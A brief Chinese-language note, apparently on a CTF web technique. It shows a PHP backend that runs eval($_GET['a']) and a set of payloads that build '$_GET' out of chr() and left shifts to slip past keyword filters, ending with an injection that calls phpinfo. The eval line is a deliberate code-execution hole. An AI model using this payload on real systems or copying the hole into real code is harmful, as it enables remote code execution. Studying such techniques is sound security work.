左移运算符

<<

写shell

构造$_GET

后台代码

1
2
3
<?php
eval($_GET['a']);
var_dump($s);

测试

1
2
3
4
5
6
7
8
?a=var_dump(chr((12<<3)-1)); ==>_
?a=var_dump(chr((9<<3)-1)); ==>G
?a=var_dump(chr((9<<3)-3)); ==>E
?a=var_dump(chr(21<<2)); ==>T
?a=var_dump((chr(9<<2)).(chr((12<<3)-1)).(chr((9<<3)-1)).(chr((9<<3)-3)).(chr(21<<2)));
==>$_GET

?a=${chr((12<<3)-1).(chr((9<<3)-1)).(chr((9<<3)-3)).(chr(21<<2))}[_]();&_=phpinfo